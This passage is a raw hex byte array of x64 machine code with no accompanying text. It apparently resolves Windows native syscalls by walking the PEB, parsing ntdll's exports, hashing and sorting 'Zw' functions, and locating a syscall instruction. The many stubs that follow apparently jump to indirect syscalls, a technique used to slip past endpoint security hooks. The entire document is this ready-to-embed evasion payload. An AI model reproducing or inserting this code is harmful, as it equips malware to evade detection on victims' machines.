x45,0xF4,0x00,0x00,0x00,0x00,0xEB,0x3E,0x8B,0x55,0xF4,0x48,0x8B,0x45,0x10,0x48,0x01,0xC2,0x8B,0x45,0xF8,0x0F,0xAF,0x45,0x18,0x89,0xC0,0x48,0x01,0xD0,0x48,0x89,0x45,0xE8,0x48,0x8B,0x55,0xE8,0x48,0x8D,0x45,0xE1,0x41,0xB8,0x03,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x52,0x50,0x00,0x00,0x85,0xC0,0x75,0x06,0x48,0x8B,0x45,0xE8,0xEB,0x76,0x83,0x45,0xF4,0x01,0x8B,0x45,0xF4,0x3B,0x45,0xE4,0x72,0xBA,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xEB,0x41,0x8B,0x55,0xF0,0x48,0x8B,0x45,0x10,0x48,0x01,0xC2,0x8B,0x45,0xF8,0x0F,0xAF,0x45,0x18,0x89,0xC1,0x48,0x89,0xD0,0x48,0x29,0xC8,0x48,0x89,0x45,0xE8,0x48,0x8B,0x55,0xE8,0x48,0x8D,0x45,0xE1,0x41,0xB8,0x03,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x00,0x50,0x00,0x00,0x85,0xC0,0x75,0x06,0x48,0x8B,0x45,0xE8,0xEB,0x24,0x83,0x45,0xF0,0x01,0x8B,0x45,0xF0,0x3B,0x45,0xE4,0x72,0xB7,0x83,0x45,0xF8,0x01,0x81,0x7D,0xF8,0x25,0x02,0x00,0x00,0x0F,0x86,0x4E,0xFF,0xFF,0xFF,0x48,0x8D,0x05,0xAA,0xFE,0xFF,0xFF,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x10,0x48,0x89,0x4D,0x10,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0xDE,0xC0,0x37,0x13,0xEB,0x28,0x8B,0x45,0xFC,0x8D,0x50,0x01,0x89,0x55,0xFC,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x0F,0xB7,0x00,0x66,0x89,0x45,0xF6,0x0F,0xB7,0x45,0xF6,0x8B,0x55,0xF8,0xC1,0xCA,0x08,0x01,0xD0,0x31,0x45,0xF8,0x8B,0x55,0xFC,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x0F,0xB6,0x00,0x84,0xC0,0x75,0xC7,0x8B,0x45,0xF8,0x48,0x83,0xC4,0x10,0x5D,0xC3,0x55,0x53,0x48,0x81,0xEC,0xE8,0x00,0x00,0x00,0x48,0x8D,0xAC,0x24,0xE0,0x00,0x00,0x00,0x8B,0x05,0x5F,0xAF,0x00,0x00,0x85,0xC0,0x74,0x0A,0xB8,0x01,0x00,0x00,0x00,0xE9,0x15,0x04,0x00,0x00,0xC7,0x85,0x64,0xFF,0xFF,0xFF,0x60,0x00,0x00,0x00,0x8B,0x85,0x64,0xFF,0xFF,0xFF,0x65,0x48,0x8B,0x00,0x48,0x89,0x85,0x58,0xFF,0xFF,0xFF,0x48,0x8B,0x85,0x58,0xFF,0xFF,0xFF,0x48,0x89,0x45,0xD0,0x48,0x8B,0x45,0xD0,0x48,0x8B,0x40,0x18,0x48,0x89,0x45,0xC8,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xC8,0x48,0x8B,0x40,0x10,0x48,0x89,0x45,0xE8,0xE9,0xA1,0x00,0x00,0x00,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x40,0x30,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x48,0x89,0x45,0xC0,0x48,0x8B,0x45,0xC0,0x8B,0x40,0x3C,0x48,0x63,0xD0,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x45,0xB8,0x48,0x8B,0x45,0xB8,0x48,0x05,0x88,0x00,0x00,0x00,0x48,0x89,0x45,0xB0,0x48,0x8B,0x45,0xB0,0x8B,0x00,0x89,0x45,0xAC,0x83,0x7D,0xAC,0x00,0x74,0x4C,0x8B,0x55,0xAC,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x0C,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x45,0xA0,0x48,0x8B,0x45,0xA0,0x8B,0x00,0x0D,0x20,0x20,0x20,0x20,0x3D,0x6E,0x74,0x64,0x6C,0x75,0x1B,0x48,0x8B,0x45,0xA0,0x48,0x83,0xC0,0x04,0x8B,0x00,0x0D,0x20,0x20,0x20,0x20,0x3D,0x6C,0x2E,0x64,0x6C,0x74,0x24,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x00,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x40,0x30,0x48,0x85,0xC0,0x0F,0x85,0x4E,0xFF,0xFF,0xFF,0xEB,0x01,0x90,0x48,0x83,0x7D,0xF8,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xFC,0x02,0x00,0x00,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x18,0x89,0x45,0xE4,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x1C,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x45,0x98,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x20,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x45,0x90,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x24,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x45,0x88,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0x8D,0x05,0xEC,0xAD,0x00,0x00,0x48,0x89,0x45,0x80,0x8B,0x45,0xE4,0x83,0xE8,0x01,0x89,0xC0,0x48,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x90,0x48,0x01,0xD0,0x8B,0x00,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x85,0x78,0xFF,0xFF,0xFF,0x48,0x8B,0x85,0x78,0xFF,0xFF,0xFF,0x0F,0xB7,0x00,0x66,0x3D,0x5A,0x77,0x75,0x6E,0x8B,0x45,0xE0,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x8D,0x1C,0x02,0x48,0x8B,0x85,0x78,0xFF,0xFF,0xFF,0x48,0x89,0xC1,0xE8,0xB2,0xFD,0xFF,0xFF,0x89,0x03,0x8B,0x45,0xE4,0x83,0xE8,0x01,0x89,0xC0,0x48,0x8D,0x14,0x00,0x48,0x8B,0x45,0x88,0x48,0x01,0xD0,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x48,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x98,0x48,0x01,0xD0,0x8B,0x55,0xE0,0x48,0x89,0xD1,0x48,0xC1,0xE1,0x04,0x48,0x8B,0x55,0x80,0x48,0x01,0xCA,0x8B,0x00,0x89,0x42,0x04,0x83,0x45,0xE0,0x01,0x81,0x7D,0xE0,0x26,0x02,0x00,0x00,0x74,0x10,0x83,0x6D,0xE4,0x01,0x83,0x7D,0xE4,0x00,0x0F,0x85,0x4B,0xFF,0xFF,0xFF,0xEB,0x01,0x90,0x8B,0x45,0xE0,0x89,0x05,0x1F,0xAD,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xE9,0x3C,0x01,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xE9,0x17,0x01,0x00,0x00,0x8B,0x45,0xDC,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x01,0xD0,0x8B,0x40,0x04,0x8B,0x55,0xDC,0x83,0xC2,0x01,0x89,0xD2,0x48,0x89,0xD1,0x48,0xC1,0xE1,0x04,0x48,0x8B,0x55,0x80,0x48,0x01,0xCA,0x8B,0x52,0x04,0x39,0xC2,0x0F,0x83,0xDE,0x00,0x00,0x00,0x48,0xC7,0x85,0x40,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x48,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x8B,0x45,0xDC,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x01,0xD0,0x8B,0x00,0x89,0x85,0x40,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x01,0xD0,0x8B,0x40,0x04,0x89,0x85,0x44,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x83,0xC0,0x01,0x89,0xC0,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x01,0xD0,0x8B,0x55,0xDC,0x48,0x89,0xD1,0x48,0xC1,0xE1,0x04,0x48,0x8B,0x55,0x80,0x48,0x01,0xCA,0x8B,0x00,0x89,0x02,0x8B,0x45,0xDC,0x83,0xC0,0x01,0x89,0xC0,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x01,0xD0,0x8B,0x55,0xDC,0x48,0x89,0xD1,0x48,0xC1,0xE1,0x04,0x48,0x8B,0x55,0x80,0x48,0x01,0xCA,0x8B,0x40,0x04,0x89,0x42,0x04,0x8B,0x45,0xDC,0x83,0xC0,0x01,0x89,0xC0,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x01,0xC2,0x8B,0x85,0x40,0xFF,0xFF,0xFF,0x89,0x02,0x8B,0x45,0xDC,0x83,0xC0,0x01,0x89,0xC0,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x01,0xC2,0x8B,0x85,0x44,0xFF,0xFF,0xFF,0x89,0x42,0x04,0x83,0x45,0xDC,0x01,0x8B,0x05,0xEA,0xAB,0x00,0x00,0x2B,0x45,0xE0,0x83,0xE8,0x01,0x39,0x45,0xDC,0x0F,0x82,0xD4,0xFE,0xFF,0xFF,0x83,0x45,0xE0,0x01,0x8B,0x05,0xD1,0xAB,0x00,0x00,0x83,0xE8,0x01,0x39,0x45,0xE0,0x0F,0x82,0xB2,0xFE,0xFF,0xFF,0x48,0x8B,0x45,0x80,0x48,0x83,0xC0,0x10,0x8B,0x50,0x04,0x48,0x8B,0x45,0x80,0x8B,0x40,0x04,0x29,0xC2,0x89,0x95,0x74,0xFF,0xFF,0xFF,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xEB,0x53,0x8B,0x45,0xE0,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x01,0xD0,0x8B,0x40,0x04,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x85,0x68,0xFF,0xFF,0xFF,0x8B,0x45,0xE0,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x8D,0x1C,0x02,0x8B,0x95,0x74,0xFF,0xFF,0xFF,0x48,0x8B,0x85,0x68,0xFF,0xFF,0xFF,0x48,0x89,0xC1,0xE8,0x48,0xFA,0xFF,0xFF,0x48,0x89,0x43,0x08,0x83,0x45,0xE0,0x01,0x8B,0x05,0x49,0xAB,0x00,0x00,0x83,0xE8,0x01,0x39,0x45,0xE0,0x72,0x9F,0xB8,0x01,0x00,0x00,0x00,0x48,0x81,0xC4,0xE8,0x00,0x00,0x00,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x89,0x4D,0x10,0xE8,0xAC,0xFB,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x3B,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xEB,0x22,0x8B,0x45,0xFC,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8D,0x05,0x05,0xAB,0x00,0x00,0x8B,0x04,0x02,0x39,0x45,0x10,0x75,0x05,0x8B,0x45,0xFC,0xEB,0x14,0x83,0x45,0xFC,0x01,0x8B,0x05,0xE6,0xAA,0x00,0x00,0x39,0x45,0xFC,0x72,0xD3,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x89,0x4D,0x10,0xE8,0x50,0xFB,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x4D,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xEB,0x34,0x8B,0x45,0xFC,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8D,0x05,0xA9,0xAA,0x00,0x00,0x8B,0x04,0x02,0x39,0x45,0x10,0x75,0x17,0x8B,0x45,0xFC,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8D,0x05,0x98,0xAA,0x00,0x00,0x48,0x8B,0x04,0x02,0xEB,0x14,0x83,0x45,0xFC,0x01,0x8B,0x05,0x78,0xAA,0x00,0x00,0x39,0x45,0xFC,0x72,0xC1,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x48,0xC7,0xC0,0x00,0x00,0x00,0x00,0xC3,0x90,0x0F,0x0B,0x48,0x8B,0x04,0x24,0xC3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x0F,0x2A,0x9B,0xCD,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x57,0xFF,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xEC,0xFE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x2F,0x1A,0xBF,0xFF,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0xFD,0xFE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x92,0xFE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x67,0x75,0x8B,0x11,0x51,0x48,0x83,0xEC,0x28,0xE8,0xA6,0xFE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x3B,0xFE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x3F,0xD3,0x52,0x22,0x51,0x48,0x83,0xEC,0x28,0xE8,0x4F,0xFE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xE4,0xFD,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0xA2,0x15,0xA9,0x8F,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0xF5,0xFD,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x8A,0xFD,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x20,0xBC,0xBC,0xBD,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x9B,0xFD,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x30,0xFD,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x80,0xE9,0x93,0x03,0x51,0x48,0x83,0xEC,0x28,0xE8,0x44,0xFD,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xD9,0xFC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x32,0x1B,0xAB,0x17,0x51,0x48,0x83,0xEC,0x28,0xE8,0xED,0xFC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x82,0xFC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x1B,0x03,0x95,0x05,0x51,0x48,0x83,0xEC,0x28,0xE8,0x96,0xFC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x2B,0xFC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x05,0x2F,0x93,0x01,0x51,0x48,0x83,0xEC,0x28,0xE8,0x3F,0xFC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xD4,0xFB,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0xB6,0x8E,0x01,0x96,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0xE5,0xFB,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x7A,0xFB,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x1A,0x2A,0xB2,0x24,0x51,0x48,0x83,0xEC,0x28,0xE8,0x8E,0xFB,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x23,0xFB,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0xE3,0xE2,0x98,0x11,0x51,0x48,0x83,0xEC,0x28,0xE8,0x37,0xFB,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xCC,0xFA,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x8F,0x2C,0x5B,0x4A,0x51,0x48,0x83,0xEC,0x28,0xE8,0xE0,0xFA,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x75,0xFA,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x13,0xA4,0xBF,0x9C,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x86,0xFA,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x1B,0xFA,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x4F,0xF6,0x23,0x0E,0x51,0x48,0x83,0xEC,0x28,0xE8,0x2F,0xFA,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xC4,0xF9,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0xE3,0x76,0x63,0x42,0x51,0x48,0x83,0xEC,0x28,0xE8,0xD8,0xF9,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x6D,0xF9,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x1A,0x6A,0xB2,0x64,0x51,0x48,0x83,0xEC,0x28,0xE8,0x81,0xF9,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x16,0xF9,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0xA0,0x64,0x2E,0x65,0x51,0x48,0x83,0xEC,0x28,0xE8,0x2A,0xF9,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xBF,0xF8,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x0C,0x32,0x9F,0x1D,0x51,0x48,0x83,0xEC,0x28,0xE8,0xD3,0xF8,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x68,0xF8,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x36,0x71,0x91,0x27,0x51,0x48,0x83,0xEC,0x28,0xE8,0x7C,0xF8,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x11,0xF8,0xFF,0xFF,0x